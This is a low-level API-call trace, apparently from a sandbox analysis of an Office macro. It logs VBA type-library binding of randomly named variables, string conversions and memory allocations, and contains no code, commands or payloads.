MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea096e, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_IHOJUBplu") returned 17 [0060.821] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_IHOJUBplu", lHashVal=0x10ae51, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.821] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5372fd2 | out: _Dst=0x343ddc) returned 0x0 [0060.821] CRetailMalloc_Free () returned 0xffff0001 [0060.821] ITypeComp:RemoteBind (in: This=0x87ce890, szName="C9czv", lHashVal=0x101add, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x532 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x532) returned 0x0 [0060.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557001a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="C9czv") returned 6 [0060.821] ITypeComp:RemoteBind (in: This=0x87ce668, szName="C9czv", lHashVal=0x101add, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x532 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x532) returned 0x0 [0060.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557001a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="C9czv") returned 6 [0060.821] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="C9czv", lHashVal=0x101add, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x532 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x532) returned 0x0 [0060.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557001a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="C9czv") returned 6 [0060.822] ITypeComp:RemoteBind (in: This=0x87cef08, szName="C9czv", lHashVal=0x101add, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x532 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x532) returned 0x0 [0060.822] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.822] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x557001a | out: _Dst=0x87fcbd8) returned 0x0 [0060.823] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea099e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_C9czv") returned 13 [0060.823] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_C9czv", lHashVal=0x10df09, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.823] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557001a | out: _Dst=0x343ddc) returned 0x0 [0060.823] CRetailMalloc_Free () returned 0x7730201 [0060.823] ITypeComp:RemoteBind (in: This=0x87ce890, szName="BYlVH1Z", lHashVal=0x10305b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x534 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x534) returned 0x0 [0060.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557003e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="BYlVH1Z") returned 8 [0060.823] ITypeComp:RemoteBind (in: This=0x87ce668, szName="BYlVH1Z", lHashVal=0x10305b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x534 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x534) returned 0x0 [0060.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557003e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="BYlVH1Z") returned 8 [0060.824] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="BYlVH1Z", lHashVal=0x10305b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x534 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x534) returned 0x0 [0060.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557003e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="BYlVH1Z") returned 8 [0060.824] ITypeComp:RemoteBind (in: This=0x87cef08, szName="BYlVH1Z", lHashVal=0x10305b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x534 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x534) returned 0x0 [0060.824] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.824] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x557003e | out: _Dst=0x87fcbd8) returned 0x0 [0060.825] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea09ca, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_BYlVH1Z") returned 15 [0060.825] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BYlVH1Z", lHashVal=0x10245e, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.825] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557003e | out: _Dst=0x343ddc) returned 0x0 [0060.825] CRetailMalloc_Realloc () returned 0x7426110 [0060.825] CRetailMalloc_Free () returned 0x7730201 [0060.826] ITypeComp:RemoteBind (in: This=0x87ce890, szName="eWEdThIxZ", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x536 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x536) returned 0x0 [0060.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570062, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="eWEdThIxZ") returned 10 [0060.826] ITypeComp:RemoteBind (in: This=0x87ce668, szName="eWEdThIxZ", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x536 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x536) returned 0x0 [0060.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570062, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="eWEdThIxZ") returned 10 [0060.826] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="eWEdThIxZ", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x536 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x536) returned 0x0 [0060.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570062, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="eWEdThIxZ") returned 10 [0060.827] ITypeComp:RemoteBind (in: This=0x87cef08, szName="eWEdThIxZ", lHashVal=0x102bb8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x536 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x536) returned 0x0 [0060.827] CRetailMalloc_Alloc () returned 0x61e2008 [0060.827] _mbscpy_s (in: _Dst=0x61e2008, _DstSizeInBytes=0xa, _Src=0x5570062 | out: _Dst=0x61e2008) returned 0x0 [0060.827] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea09f6, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_eWEdThIxZ") returned 17 [0060.827] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_eWEdThIxZ", lHashVal=0x10257c, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.828] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570062 | out: _Dst=0x343ddc) returned 0x0 [0060.828] CRetailMalloc_Free () returned 0xffff0001 [0060.828] ITypeComp:RemoteBind (in: This=0x87ce890, szName="ZviDwVI0d", lHashVal=0x102eed, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x538 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x538) returned 0x0 [0060.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557008a, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="ZviDwVI0d") returned 10 [0060.828] ITypeComp:RemoteBind (in: This=0x87ce668, szName="ZviDwVI0d", lHashVal=0x102eed, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x538 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x538) returned 0x0 [0060.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557008a, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="ZviDwVI0d") returned 10 [0060.828] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="ZviDwVI0d", lHashVal=0x102eed, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x538 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x538) returned 0x0 [0060.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557008a, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="ZviDwVI0d") returned 10 [0060.829] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ZviDwVI0d", lHashVal=0x102eed, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x538 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x538) returned 0x0 [0060.829] CRetailMalloc_Alloc () returned 0x61e2008 [0060.829] _mbscpy_s (in: _Dst=0x61e2008, _DstSizeInBytes=0xa, _Src=0x557008a | out: _Dst=0x61e2008) returned 0x0 [0060.829] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0a26, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_ZviDwVI0d") returned 17 [0060.830] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ZviDwVI0d", lHashVal=0x103832, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.830] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x557008a | out: _Dst=0x343ddc) returned 0x0 [0060.830] CRetailMalloc_Free () returned 0xffff0001 [0060.830] ITypeComp:RemoteBind (in: This=0x87ce890, szName="HiatK", lHashVal=0x1043a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x53a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x53a) returned 0x0 [0060.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700b2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="HiatK") returned 6 [0060.830] ITypeComp:RemoteBind (in: This=0x87ce668, szName="HiatK", lHashVal=0x1043a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x53a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x53a) returned 0x0 [0060.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700b2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="HiatK") returned 6 [0060.830] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="HiatK", lHashVal=0x1043a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x53a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x53a) returned 0x0 [0060.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700b2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="HiatK") returned 6 [0060.831] ITypeComp:RemoteBind (in: This=0x87cef08, szName="HiatK", lHashVal=0x1043a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x53a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x53a) returned 0x0 [0060.831] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.831] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x55700b2 | out: _Dst=0x87fcbd8) returned 0x0 [0060.832] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0a56, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_HiatK") returned 13 [0060.832] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_HiatK", lHashVal=0x10078f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.832] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55700b2 | out: _Dst=0x343ddc) returned 0x0 [0060.832] CRetailMalloc_Free () returned 0x7730201 [0060.832] ITypeComp:RemoteBind (in: This=0x87ce890, szName="vL2v5O", lHashVal=0x105157, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x53c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x53c) returned 0x0 [0060.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700d6, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="vL2v5O") returned 7 [0060.832] ITypeComp:RemoteBind (in: This=0x87ce668, szName="vL2v5O", lHashVal=0x105157, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x53c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x53c) returned 0x0 [0060.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700d6, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="vL2v5O") returned 7 [0060.832] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="vL2v5O", lHashVal=0x105157, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x53c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x53c) returned 0x0 [0060.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700d6, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="vL2v5O") returned 7 [0060.833] ITypeComp:RemoteBind (in: This=0x87cef08, szName="vL2v5O", lHashVal=0x105157, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x53c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x53c) returned 0x0 [0060.833] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.833] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55700d6 | out: _Dst=0x87fcbd8) returned 0x0 [0060.834] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0a82, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_vL2v5O") returned 14 [0060.834] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_vL2v5O", lHashVal=0x10cc00, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.834] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55700d6 | out: _Dst=0x343ddc) returned 0x0 [0060.834] CRetailMalloc_Free () returned 0x7730201 [0060.834] ITypeComp:RemoteBind (in: This=0x87ce890, szName="ilr1W", lHashVal=0x107c6e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x53e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x53e) returned 0x0 [0060.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700fa, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="ilr1W") returned 6 [0060.834] ITypeComp:RemoteBind (in: This=0x87ce668, szName="ilr1W", lHashVal=0x107c6e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x53e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x53e) returned 0x0 [0060.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700fa, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="ilr1W") returned 6 [0060.835] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="ilr1W", lHashVal=0x107c6e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x53e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x53e) returned 0x0 [0060.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55700fa, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="ilr1W") returned 6 [0060.835] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ilr1W", lHashVal=0x107c6e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x53e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x53e) returned 0x0 [0060.835] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.835] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x55700fa | out: _Dst=0x87fcbd8) returned 0x0 [0060.836] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0aae, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_ilr1W") returned 13 [0060.836] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ilr1W", lHashVal=0x10405b, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.836] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55700fa | out: _Dst=0x343ddc) returned 0x0 [0060.836] CRetailMalloc_Free () returned 0x7730201 [0060.837] ITypeComp:RemoteBind (in: This=0x87ce890, szName="DVxmXA7D", lHashVal=0x103ca3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x540 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x540) returned 0x0 [0060.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557011e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="DVxmXA7D") returned 9 [0060.837] ITypeComp:RemoteBind (in: This=0x87ce668, szName="DVxmXA7D", lHashVal=0x103ca3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x540 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x540) returned 0x0 [0060.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557011e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="DVxmXA7D") returned 9 [0060.837] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="DVxmXA7D", lHashVal=0x103ca3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x540 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x540) returned 0x0 [0060.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557011e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="DVxmXA7D") returned 9 [0060.838] ITypeComp:RemoteBind (in: This=0x87cef08, szName="DVxmXA7D", lHashVal=0x103ca3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x540 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x540) returned 0x0 [0060.838] CRetailMalloc_Alloc () returned 